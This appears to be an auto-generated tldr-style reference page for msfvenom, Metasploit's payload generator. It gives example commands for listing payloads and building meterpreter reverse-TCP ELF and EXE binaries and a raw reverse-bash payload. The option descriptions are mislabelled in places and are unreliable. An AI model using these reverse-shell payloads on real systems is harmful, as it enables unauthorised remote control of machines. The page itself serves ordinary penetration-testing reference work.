commands.sh

msfvenom

all

Manually generate payloads for metasploit.

More info →

Options (4)

-l, --listboolean

List payloads

Example: msfvenom {{[-l|--list]}} payloads
-p, --payloadboolean

Show payload options

Example: msfvenom {{[-p|--payload]}} {{payload}} --list-options
-f, --formatboolean

Create an ELF binary with a reverse TCP handler

Example: msfvenom {{[-p|--payload]}} linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} {{[-f|--format]}} elf {{[-o|--out]}} {{path/to/binary}}
-o, --outboolean

Create an ELF binary with a reverse TCP handler

Example: msfvenom {{[-p|--payload]}} linux/x64/meterpreter/reverse_tcp LHOST={{local_ip}} LPORT={{local_port}} {{[-f|--format]}} elf {{[-o|--out]}} {{path/to/binary}}

Examples (6)

List payloads

msfvenom [-l|--list] payloads

List formats

msfvenom [-l|--list] formats

Show payload options

msfvenom [-p|--payload] payload --list-options

Create an ELF binary with a reverse TCP handler

msfvenom [-p|--payload] linux/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port [-f|--format] elf [-o|--out] path/to/binary

Create an EXE binary with a reverse TCP handler

msfvenom [-p|--payload] windows/x64/meterpreter/reverse_tcp LHOST=local_ip LPORT=local_port [-f|--format] exe [-o|--out] path/to/binary.exe

Create a raw Bash with a reverse TCP handler

msfvenom [-p|--payload] cmd/unix/reverse_bash LHOST=local_ip LPORT=local_port [-f|--format] raw
made by @shridhargupta | data from tldr-pages